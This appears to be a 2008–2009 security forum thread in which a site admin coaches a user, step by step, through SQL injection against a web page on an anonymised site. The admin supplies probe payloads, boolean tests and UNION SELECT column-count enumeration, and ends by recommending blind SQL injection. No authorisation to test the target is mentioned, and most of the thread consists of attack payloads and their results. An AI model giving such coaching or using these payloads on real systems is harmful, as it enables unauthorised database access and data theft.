 |
|
 |
 |
|
 |
IT Security and Insecurity Portal |
|
 |
SQL injection help |
 |
 Posted: Wed Dec 31, 2008 8:29 pm |
 |
|
| fadai |
| Regular user |
 |
|
| Joined: Oct 30, 2008 |
| Posts: 11 |
|
|
|
 |
|
 |
|
http://www.site.com/services.php?page=1'
When i goto the above url, it shows the error ;
| Code: | | Warning: mysql_num_rows(): supplied argument is not a valid MySQL result resource in /home/user/htdocs/package/user/classes/structure.php |
Could there be an sql injection? |
|
|
|
|
| Posted: Thu Jan 01, 2009 1:43 am |
|
|
| waraxe |
| Site admin |
 |
|
| Joined: May 11, 2004 |
| Posts: 2407 |
| Location: Estonia, Tartu |
|
|
|
|
|
|
Probably it's sql injection, but more tests needed.
| Code: |
services.php?page=1z
|
| Code: |
services.php?page=1--+
|
| Code: |
services.php?page=1)--+
|
| Code: |
services.php?page=1+AND+1=1+
|
| Code: |
services.php?page=1+AND+1=2+
|
Look for responses - is there error messages or something else. Post your results here and if sql injection is exploitable, then I will give next hints
 |
|
|
|
|
| Posted: Sat Jan 03, 2009 9:00 pm |
|
|
| fadai |
| Regular user |
|
|
| Joined: Oct 30, 2008 |
| Posts: 11 |
|
|
|
|
|
|
|
| Code: |
services.php?page=1z
|
no error
| Code: |
services.php?page=1--+
|
no error
| Code: |
services.php?page=1)--+
|
no error
| Code: |
services.php?page=1+AND+1=1+
|
no error
| Code: |
services.php?page=1+AND+1=2+
|
no error |
|
|
|
|
| Posted: Sun Jan 04, 2009 12:58 pm |
|
|
| waraxe |
| Site admin |
|
|
| Joined: May 11, 2004 |
| Posts: 2407 |
| Location: Estonia, Tartu |
|
|
|
|
|
|
OK, try this tests:
| Code: |
services.php?page=1'--+
|
| Code: |
services.php?page=1')--+
|
| Code: |
services.php?page=1'+AND+1=2--+
|
| Code: |
services.php?page=1')+AND+1=2--+
|
|
|
|
|
|
| Posted: Sun Jan 04, 2009 5:24 pm |
|
|
| fadai |
| Regular user |
|
|
| Joined: Oct 30, 2008 |
| Posts: 11 |
|
|
|
|
|
|
|
| Code: |
services.php?page=1'--+
|
error
| Code: |
services.php?page=1')--+
|
no error
| Code: |
services.php?page=1'+AND+1=2--+
|
error
| Code: |
services.php?page=1')+AND+1=2--+
|
no error |
|
|
|
|
| Posted: Sun Jan 04, 2009 6:17 pm |
|
|
| waraxe |
| Site admin |
|
|
| Joined: May 11, 2004 |
| Posts: 2407 |
| Location: Estonia, Tartu |
|
|
|
|
|
|
OK, now try UNION method:
| Code: |
services.php?page=-1')+UNION+SELECT+1--+
|
| Code: |
services.php?page=-1')+UNION+SELECT+1,2--+
|
| Code: |
services.php?page=-1')+UNION+SELECT+1,2,3--+
|
If you will get errors, then continue tests (1,2,3,4 etc) till you get no errors.
This will be right column count you need for further exploitation. |
|
|
|
|
| Posted: Sun Jan 04, 2009 6:33 pm |
|
|
| fadai |
| Regular user |
|
|
| Joined: Oct 30, 2008 |
| Posts: 11 |
|
|
|
|
|
|
|
| Code: | | Warning: mysql_num_rows(): supplied argument is not a valid MySQL result resource in /home/customer/htdocs/pack/user/classes/structure.php on line 19 |
i am getting this error , should i continue with this error? |
|
|
|
|
| Posted: Sun Jan 04, 2009 9:01 pm |
|
|
| waraxe |
| Site admin |
|
|
| Joined: May 11, 2004 |
| Posts: 2407 |
| Location: Estonia, Tartu |
|
|
|
|
|
|
| Yes, continue test, because valid column count can be big number, like 25 or even 50. |
|
|
|
|
| Posted: Mon Jan 05, 2009 10:16 am |
|
|
| fadai |
| Regular user |
|
|
| Joined: Oct 30, 2008 |
| Posts: 11 |
|
|
|
|
|
|
|
| Code: | | http://www.site.com/services.php?page=-1')+UNION+SELECT+1,2,3,.....,90,91,92,93,94,95,96,97,98,99,100--+ |
Still this error
| Code: | | Warning: mysql_num_rows(): supplied argument is not a valid MySQL result resource in /home/customer/htdocs/pack/user/classes/structure.php on line 19 |
Do u still recommend to continue? |
|
|
|
|
| Posted: Mon Jan 05, 2009 1:25 pm |
|
|
| waraxe |
| Site admin |
|
|
| Joined: May 11, 2004 |
| Posts: 2407 |
| Location: Estonia, Tartu |
|
|
|
|
|
|
| No, do not continue. It's obvious, that UNION method does not work here as expected. This may be older mysql version without UNION support or there can be multiple sql queries with different column count. Seems, that your best option is blind sql injection. This means, that exploiting will take more time and needs more experience. |
|
|
|
|
www.waraxe.us Forum Index -> Sql injection
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
|
All times are GMT
Page 1 of 1
|
|
|
|
Powered by phpBB © 2001-2008 phpBB Group
|
|
|
|
|
Discussions
Tools
Content
Info
Membership:
Latest: 
New Today: 0
New Yesterday: 0
Overall: 9144
People Online:
Visitors: 98
Members: 0
Total: 98
